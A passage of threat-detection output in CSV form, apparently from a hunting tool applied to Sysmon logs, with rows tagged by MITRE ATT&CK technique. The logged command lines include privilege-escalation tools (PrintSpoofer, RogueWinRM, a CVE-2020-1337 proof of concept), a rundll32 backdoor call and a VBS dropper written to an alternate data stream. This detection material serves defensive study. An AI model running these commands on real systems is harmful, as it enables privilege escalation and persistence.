+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-B592-5EAD-0000-0010ECCBC200
+ 6760
+ C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe
+ PrintSpoofer.exe -i -c powershell.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 110434
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-02 18:01:54.866
+ 747F3D96-B592-5EAD-0000-0010D4CDC200
+ 1428
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ powershell.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-6ABB-5EAD-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-B592-5EAD-0000-0010ECCBC200
+ 6760
+ C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe
+ PrintSpoofer.exe -i -c powershell.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 348
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:48:45.193
+ 747F3D96-292D-5E1E-0000-0010F5597D00
+ 3828
+ C:\Windows\explorer.exe
+ 10.0.17763.348 (WinBuild.160101.0800)
+ Windows Explorer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ EXPLORER.EXE
+ explorer ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-292D-5E1E-0000-0020CD587D00
+ 0x7d58cd
+ 0
+ High
+ SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959
+ 747F3D96-2910-5E1E-0000-0010F5F07C00
+ 4612
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 348
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:48:45.193
+ 747F3D96-292D-5E1E-0000-0010F5597D00
+ 3828
+ C:\Windows\explorer.exe
+ 10.0.17763.348 (WinBuild.160101.0800)
+ Windows Explorer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ EXPLORER.EXE
+ explorer ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-292D-5E1E-0000-0020CD587D00
+ 0x7d58cd
+ 0
+ High
+ SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959
+ 747F3D96-2910-5E1E-0000-0010F5F07C00
+ 4612
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2164892
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2020-10-05 20:43:58.450
+ 00247C92-858E-5F7B-0000-0010E741202B
+ 6636
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe
+ C:\windows\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-8C36-5F75-0000-002034E39103
+ 0x391e334
+ 2
+ High
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00247C92-858E-5F7B-0000-00105241202B
+ 18404
+ C:\Windows\System32\Taskmgr.exe
+ C:\windows\system32\taskmgr.exe
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342414
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:06:03.484
+ 747F3D96-E93B-5F33-0000-0010C1B40E00
+ 7888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
+ MSEDGEWIN10\IEUser
+ 747F3D96-E911-5F33-0000-0020241C0400
+ 0x41c24
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E938-5F33-0000-00109CA00E00
+ 7820
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
+ WerTrigger.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243570
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:45.082
+ 747F3D96-9F7D-5E75-0000-00104E062100
+ 2484
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-9F77-5E75-0000-001090F32000
+ 2416
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 196371
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-24 01:13:50.301
+ 747F3D96-CA4E-5EC9-0000-00109FE23700
+ 1516
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ c:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-BDD1-5EC9-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-CA4B-5EC9-0000-0010B8CB3700
+ 3960
+ C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe
+ RogueWinRM.exe -p c:\Windows\System32\cmd.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8114
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-20 08:07:48.894
+ 365ABB72-3ED4-5D0B-0000-00106C871A00
+ 888
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "cmd"
+ c:\ProgramData\
+ IEWIN7\IEUser
+ 365ABB72-3991-5D0B-0000-002029350100
+ 0x13529
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-3D05-5D0B-0000-001004220D00
+ 816
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342413
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:06:02.548
+ 747F3D96-E93A-5F33-0000-001014B30E00
+ 7868
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
+ MSEDGEWIN10\IEUser
+ 747F3D96-E911-5F33-0000-0020241C0400
+ 0x41c24
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E938-5F33-0000-00109CA00E00
+ 7820
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
+ WerTrigger.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11238
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 02:52:23.484
+ 365ABB72-95E7-5CD3-0000-001046950F00
+ 2812
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""
+ C:\Users\IEUser\AppData\Local\Temp\onedrive\
+ IEWIN7\IEUser
+ 365ABB72-94CD-5CD3-0000-0020DD3A0100
+ 0x13add
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-9570-5CD3-0000-00103FC90A00
+ 1900
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 423994
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:57:36.012
+ 747F3D96-51D0-5F93-0000-001036A15B00
+ 3396
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
+ C:\Users\IEUser\AppData\Local\Temp\tmp1375\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002085A50800
+ 0x8a585
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51CD-5F93-0000-001073735B00
+ 7624
+ C:\Users\Public\test.tmp
+ c:\Users\Public\test.tmp
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 423994
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:57:36.012
+ 747F3D96-51D0-5F93-0000-001036A15B00
+ 3396
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
+ C:\Users\IEUser\AppData\Local\Temp\tmp1375\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002085A50800
+ 0x8a585
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51CD-5F93-0000-001073735B00
+ 7624
+ C:\Users\Public\test.tmp
+ c:\Users\Public\test.tmp
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 423994
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:57:36.012
+ 747F3D96-51D0-5F93-0000-001036A15B00
+ 3396
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
+ C:\Users\IEUser\AppData\Local\Temp\tmp1375\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002085A50800
+ 0x8a585
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51CD-5F93-0000-001073735B00
+ 7624
+ C:\Users\Public\test.tmp
+ c:\Users\Public\test.tmp
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243568
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:39.417
+ 747F3D96-9F77-5E75-0000-001090F32000
+ 2416
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-9F61-5E75-0000-0010686A1E00
+ 4848
+ C:\Windows\System32\rundll32.exe
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342412
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:06:01.636
+ 747F3D96-E939-5F33-0000-0010ACAB0E00
+ 7852
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
+ MSEDGEWIN10\IEUser
+ 747F3D96-E911-5F33-0000-0020241C0400
+ 0x41c24
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E938-5F33-0000-00109CA00E00
+ 7820
+ C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
+ WerTrigger.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5408
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-26 15:47:56.627
+ 365ABB72-B52C-5CEA-0000-00107A0D1100
+ 3388
+ C:\Windows\System32\notepad.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Notepad
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\notepad.exe
+ c:\windows\system32\inetsrv\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3
+ 365ABB72-B26B-5CEA-0000-0010582A0800
+ 2744
+ C:\Windows\System32\inetsrv\w3wp.exe
+ c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 345
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:48:17.270
+ 747F3D96-2911-5E1E-0000-0010D80A7D00
+ 2416
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "cmd.exe" /c notepad.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2910-5E1E-0000-002082EF7C00
+ 0x7cef82
+ 0
+ High
+ SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-2910-5E1E-0000-001053F57C00
+ 4448
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c start ms-browser://
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5703
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-04 09:10:30.702
+ 747F3D96-A106-5D46-0000-00102425BD03
+ 6604
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-A106-5D46-0000-00107201BD03
+ 1380
+ C:\Windows\System32\control.exe
+ "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342411
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:06:00.734
+ 747F3D96-E938-5F33-0000-00101CA50E00
+ 7836
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
